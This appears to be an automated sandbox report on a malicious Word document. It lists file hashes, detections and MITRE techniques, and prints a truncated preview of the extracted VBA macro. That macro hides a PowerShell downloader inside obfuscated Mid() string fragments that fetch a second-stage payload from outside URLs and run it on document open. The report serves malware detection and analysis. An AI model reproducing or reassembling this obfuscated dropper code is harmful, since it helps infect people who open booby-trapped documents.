Office (OLE) malware analysis — malicious · 0161d8de95529992

MALICIOUS

Office (OLE)

179.5 KB Created: 2017-12-07 13:01:00 Authoring application: Microsoft Office Word First seen: 2018-01-08

MD5: ee93bac6fe532fe5a0d7a0cbced06144 SHA-1: 668699d357172d228f99718d57e233f9dc8ae206 SHA-256: 0161d8de95529992eb38621ec048bb7cbc1ce25d014a0ddbc1024cd73bba188d

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro utilizes obfuscated string concatenation to construct a URL, which it then uses to download and execute a second-stage payload. The ClamAV detection name 'Img.Dropper.PhishingLure' suggests a phishing lure, likely leading to further malicious activity.

Heuristics 7

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://jAu+jAugjAu In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 70107 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	70107 bytes
SHA-256: `5aa979bb0e74debdde88614ac149f5d1d530b3bcf633e511fe2c7d4d4bdcf81c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "kLGoXvSbYq" Function GroQSZEWTizL() LGrHVCp = Array(UCase("RnmCZjZna" + "wnAadaJVzj" + "vNNvDFuZ" + "HERnIsTfRuY" + "AFSwRjrZcZzjH"), UCase("aZGWifNvRu" + "MSkHiEDLWu" + "uzlZCACi" + "ifmSuYv" + "saFnYcFNH")) vUNtVMJREuK = Mid("U5DW5UQ+t'+'UQctUQ+tUQ.ctUQ+tUQotU'+'Q+tUQm/GtUQ+tUQdety3tUQ+tUQ6jAu+jAu,htttUQ+'+'tUQp://42tUQ+tUQ0entUQ+tUQt.com/GdtUQ+tUQety36,htUQ+tUQttp:tUQ+tUQ/tUQ+tUQ/tUQ+tUQfbl.t'+'U'+'2PibP9porpfuLSZIJw8sWUisu", 6, 172) JQwnjBzQdtl = Array(UCase("ZThdaMap" + "iTllUIRNU" + "HACTbpv" + "ruTtGtKWkLNKXQ" + "amoSEPJYHijcI"), UCase("AFniRjvwoN" + "awXGAJjqNbhmW" + "ihVMPZQCzkGZj" + "hrizbbd" + "lSGUzlvvS")) PUpdi = Array(UCase("zUtXkbSiJ" + "EcNsjnnjjSMF" + "nSwpUWUj" + "viFNMLuK" + "PPLLQNMEkpYhoF"), UCase("MGEolzIoDthin" + "bclVSwpwcC" + "dPliIdGcNBGG" + "YBHbIRj" + "YiJNmMWICPdC")) CQkaa = Array(UCase("waakIOpAKYm" + "iGTHwMjsYjvmUd" + "akDtXWnrw" + "QVlhJAzGMkjEj" + "FNqGPinP"), UCase("APQHiPbvOVQ" + "qwKOjwjHtiV" + "uoJfjbU" + "BqkSttS" + "loVjScOOjsjfH")) EnqtAq = Mid("vM8wAl9TTQbsH1O0SaNKciFhS4lWrTFDB6+tUQc in tUQ+tUQpbItUQ+tUQbcdtUQ+tUQ'+')tUQ+tUQ{ttUQ+tUQry{pbIfranc'+'.DowjAu'+'+jAunloadFile(t'+'UQ+tUQptUQ+tUQbIabc.TtUQ+tUQ'+'oString(tUQ+tUQ), tUQ+tUQptUQ+tUQbIhuas)tUQ+tUQ;InvotUQ+tUQke-ItUQ+tUQFwoa", 35, 199) dWcDkiSji = Array(UCase("IhWKuPa" + "aUUVfwQ" + "OoKTzEjcRWRkT" + "ldEzQUkQ" + "CIfwOorGQ"), UCase("TnbSiGE" + "utXzqjP" + "rRjjwEzaIKTF" + "oZQBizXKK" + "tLSqXqERwi")) jiXodonZNw = Array(UCase("lVtPMqFv" + "mANiANrUm" + "oWEJmiSauzo" + "ovtEPYihclpai" + "EwNBoXzzSlhL"), UCase("htPKwauM" + "lwzSqFDDh" + "bEdTMtKRvoc" + "XESwnMbs" + "nVmNRDVjrwPECj")) qorsCkNVpf = Array(UCase("ZVjjuhUvDu" + "ZStDmIAnWKd" + "bVITZOPwiOHN" + "HMiPKwz" + "ctYYRWfkwNLvn"), UCase("OlOujnz" + "KLfzivVYMLdtzc" + "vHskMlAwRQDw" + "BPRMqjiNsRrkO" + "BzRtFlBTno")) ziAWiUQCHaz = Mid("sNbmzHO).rEPLACe(([CHAr]103+[CHAr]73+[CHAr]85),[String][CHAr]36).rEPLACe('UuJ','\|').rEPLACe('jAu',[String][CHAr]39))TmDGHEL3a", 8, 109) sHSEhmj = Array(UCase("EaCRmJz" + "pdYtAuRqbp" + "oiqGvqolDsN" + "UUQsNKK" + "qnzzjsJ"), UCase("maFnPYvTNT" + "awYwfcaE" + "kBEjRjoAlt" + "DjTwdmZnwZ" + "iuDjHSrRUInkkk")) zvzXriU = Array(UCase("lKJPOjb" + "cXwuRCTtXCqBAz" + "zwzXwMri" + "dJFVYwiiQnm" + "FFAqlri"), UCase("wnDozKSOM" + "klpTRIzzVZY" + "kNLLtrzh" + "UNRfpGQX" + "fPWnCBMln")) OaKlNMv = Array(UCase("iUFIFBYsWHP" + "tCURHUNLoiZQfD" + "jSpDBoBmtmt" + "CtiiPLOlF" + "NrKdBqEup"), UCase("CZoahENFrQb" + "OCLRJwJERRW" + "EzsYnKhwz" + "QcFDALwJt" + "qidISjhHlkLkC")) KPvapO = Mid("FW'+'ReFEREnCe)[1,3]+tjAu+jAuUQxtUQ-JOIntUQtUQ)jAu'+').'+'replacE(jAutUQjAu,[sTring][chAR]39).replacE(([chAR]107+[c'+'h'+'AR]88+[chAR]54),jAuUuJjAu).replacE(jAuArqjAu,[sTring][chAR]36))'J1NlAWhh2jbSuRzIGaAc", 3, 184) aACoW = Array(UCase("snWFroCqdmQaO" + "PPXXnbChaHt" + "lzKKwHEH" + "ZwHarnQnkzEAr" + "mdpwMqLNPL"), UCase("CEfSoIWHqqRQ" + "womtpKoHuZXhJJ" + "QdLjwroikVwoh" + "BjUNsBXDSXEWa" + "fIliziqM")) INNzt = Array(UCase("WjLoRhichz" + "iMFvzGHXibVU" + "FEdaMNFfZihR" + "JsMGNBj" + "kWbLniDMUv"), UCase("ObjNEIP" + "rGIiXizwPL" + "NUoNUhBOZjC" + "FmhCYaiIz" + "hoQbrDhphoAsif")) CzYjoAQTGO = Array(UCase("zVmnuQz" + "CfzWVcwlHiaIo" + "JWRorUMbGZt" + "JfDMSIKpJuFif" + "EBCYBqMVLPWFY"), UCase("fbYadjSQhuL" + "zwUPRnJBP" + "YiYCcnUo" + "NjfJiWiAzXnTI" + "jsNAwziv")) UDitu = Mid("D7WlY6cAbbTrX+tUQhtUQ+tUQutUQ+tUQastUQ+tUQ = pbIetUQ+tUQntUQ+tUQv:publitjAu+jAuUQ+tUQctUQ+tUQ +'+' tUQ+tUQaToaDCAsADpLC9lWqADu2z8nIwK", 14, 94) oXUHQuw = Array(UCase("OOfCuqlomDs" + "cZWkDiPmzwtpz" + "jBNSMEBbKLzF" + "HwAiYzN" + "QLDzNSs"), UCase("RVpENGjaTqn" + "APKlzbIqzSVqj" + "TpKUwlJAspJ" + "pAMZKhL" + "EBASAmKCbz")) uFcViDfj = Array(UCase("PVCpCbDiwt" + "wiRpmsn" + "KibrPWoJPnYq" + "RMQofjcZ" + "srZENAaYODKwls"), UCase("dmTNRnrYDvhVB" + "GMKMOlk" + "LIojrYUjL" + "TcKsMOIHBTW" + "jiY ... (truncated)

SHA-256: 5aa979bb0e74debdde88614ac149f5d1d530b3bcf633e511fe2c7d4d4bdcf81c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "kLGoXvSbYq"
Function GroQSZEWTizL()
LGrHVCp = Array(UCase("RnmCZjZna" + "wnAadaJVzj" + "vNNvDFuZ" + "HERnIsTfRuY" + "AFSwRjrZcZzjH"), UCase("aZGWifNvRu" + "MSkHiEDLWu" + "uzlZCACi" + "ifmSuYv" + "saFnYcFNH"))
vUNtVMJREuK = Mid("U5DW5UQ+t'+'UQctUQ+tUQ.ctUQ+tUQotU'+'Q+tUQm/GtUQ+tUQdety3tUQ+tUQ6jAu+jAu,htttUQ+'+'tUQp://42tUQ+tUQ0entUQ+tUQt.com/GdtUQ+tUQety36,htUQ+tUQttp:tUQ+tUQ/tUQ+tUQ/tUQ+tUQfbl.t'+'U'+'2PibP9porpfuLSZIJw8sWUisu", 6, 172)
JQwnjBzQdtl = Array(UCase("ZThdaMap" + "iTllUIRNU" + "HACTbpv" + "ruTtGtKWkLNKXQ" + "amoSEPJYHijcI"), UCase("AFniRjvwoN" + "awXGAJjqNbhmW" + "ihVMPZQCzkGZj" + "hrizbbd" + "lSGUzlvvS"))
PUpdi = Array(UCase("zUtXkbSiJ" + "EcNsjnnjjSMF" + "nSwpUWUj" + "viFNMLuK" + "PPLLQNMEkpYhoF"), UCase("MGEolzIoDthin" + "bclVSwpwcC" + "dPliIdGcNBGG" + "YBHbIRj" + "YiJNmMWICPdC"))
CQkaa = Array(UCase("waakIOpAKYm" + "iGTHwMjsYjvmUd" + "akDtXWnrw" + "QVlhJAzGMkjEj" + "FNqGPinP"), UCase("APQHiPbvOVQ" + "qwKOjwjHtiV" + "uoJfjbU" + "BqkSttS" + "loVjScOOjsjfH"))
EnqtAq = Mid("vM8wAl9TTQbsH1O0SaNKciFhS4lWrTFDB6+tUQc in tUQ+tUQpbItUQ+tUQbcdtUQ+tUQ'+')tUQ+tUQ{ttUQ+tUQry{pbIfranc'+'.DowjAu'+'+jAunloadFile(t'+'UQ+tUQptUQ+tUQbIabc.TtUQ+tUQ'+'oString(tUQ+tUQ), tUQ+tUQptUQ+tUQbIhuas)tUQ+tUQ;InvotUQ+tUQke-ItUQ+tUQFwoa", 35, 199)
dWcDkiSji = Array(UCase("IhWKuPa" + "aUUVfwQ" + "OoKTzEjcRWRkT" + "ldEzQUkQ" + "CIfwOorGQ"), UCase("TnbSiGE" + "utXzqjP" + "rRjjwEzaIKTF" + "oZQBizXKK" + "tLSqXqERwi"))
jiXodonZNw = Array(UCase("lVtPMqFv" + "mANiANrUm" + "oWEJmiSauzo" + "ovtEPYihclpai" + "EwNBoXzzSlhL"), UCase("htPKwauM" + "lwzSqFDDh" + "bEdTMtKRvoc" + "XESwnMbs" + "nVmNRDVjrwPECj"))
qorsCkNVpf = Array(UCase("ZVjjuhUvDu" + "ZStDmIAnWKd" + "bVITZOPwiOHN" + "HMiPKwz" + "ctYYRWfkwNLvn"), UCase("OlOujnz" + "KLfzivVYMLdtzc" + "vHskMlAwRQDw" + "BPRMqjiNsRrkO" + "BzRtFlBTno"))
ziAWiUQCHaz = Mid("sNbmzHO).rEPLACe(([CHAr]103+[CHAr]73+[CHAr]85),[String][CHAr]36).rEPLACe('UuJ','|').rEPLACe('jAu',[String][CHAr]39))TmDGHEL3a", 8, 109)
sHSEhmj = Array(UCase("EaCRmJz" + "pdYtAuRqbp" + "oiqGvqolDsN" + "UUQsNKK" + "qnzzjsJ"), UCase("maFnPYvTNT" + "awYwfcaE" + "kBEjRjoAlt" + "DjTwdmZnwZ" + "iuDjHSrRUInkkk"))
zvzXriU = Array(UCase("lKJPOjb" + "cXwuRCTtXCqBAz" + "zwzXwMri" + "dJFVYwiiQnm" + "FFAqlri"), UCase("wnDozKSOM" + "klpTRIzzVZY" + "kNLLtrzh" + "UNRfpGQX" + "fPWnCBMln"))
OaKlNMv = Array(UCase("iUFIFBYsWHP" + "tCURHUNLoiZQfD" + "jSpDBoBmtmt" + "CtiiPLOlF" + "NrKdBqEup"), UCase("CZoahENFrQb" + "OCLRJwJERRW" + "EzsYnKhwz" + "QcFDALwJt" + "qidISjhHlkLkC"))
KPvapO = Mid("FW'+'ReFEREnCe)[1,3]+tjAu+jAuUQxtUQ-JOIntUQtUQ)jAu'+').'+'replacE(jAutUQjAu,[sTring][chAR]39).replacE(([chAR]107+[c'+'h'+'AR]88+[chAR]54),jAuUuJjAu).replacE(jAuArqjAu,[sTring][chAR]36))'J1NlAWhh2jbSuRzIGaAc", 3, 184)
aACoW = Array(UCase("snWFroCqdmQaO" + "PPXXnbChaHt" + "lzKKwHEH" + "ZwHarnQnkzEAr" + "mdpwMqLNPL"), UCase("CEfSoIWHqqRQ" + "womtpKoHuZXhJJ" + "QdLjwroikVwoh" + "BjUNsBXDSXEWa" + "fIliziqM"))
INNzt = Array(UCase("WjLoRhichz" + "iMFvzGHXibVU" + "FEdaMNFfZihR" + "JsMGNBj" + "kWbLniDMUv"), UCase("ObjNEIP" + "rGIiXizwPL" + "NUoNUhBOZjC" + "FmhCYaiIz" + "hoQbrDhphoAsif"))
CzYjoAQTGO = Array(UCase("zVmnuQz" + "CfzWVcwlHiaIo" + "JWRorUMbGZt" + "JfDMSIKpJuFif" + "EBCYBqMVLPWFY"), UCase("fbYadjSQhuL" + "zwUPRnJBP" + "YiYCcnUo" + "NjfJiWiAzXnTI" + "jsNAwziv"))
UDitu = Mid("D7WlY6cAbbTrX+tUQhtUQ+tUQutUQ+tUQastUQ+tUQ = pbIetUQ+tUQntUQ+tUQv:publitjAu+jAuUQ+tUQctUQ+tUQ +'+' tUQ+tUQaToaDCAsADpLC9lWqADu2z8nIwK", 14, 94)
oXUHQuw = Array(UCase("OOfCuqlomDs" + "cZWkDiPmzwtpz" + "jBNSMEBbKLzF" + "HwAiYzN" + "QLDzNSs"), UCase("RVpENGjaTqn" + "APKlzbIqzSVqj" + "TpKUwlJAspJ" + "pAMZKhL" + "EBASAmKCbz"))
uFcViDfj = Array(UCase("PVCpCbDiwt" + "wiRpmsn" + "KibrPWoJPnYq" + "RMQofjcZ" + "srZENAaYODKwls"), UCase("dmTNRnrYDvhVB" + "GMKMOlk" + "LIojrYUjL" + "TcKsMOIHBTW" + "jiY
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.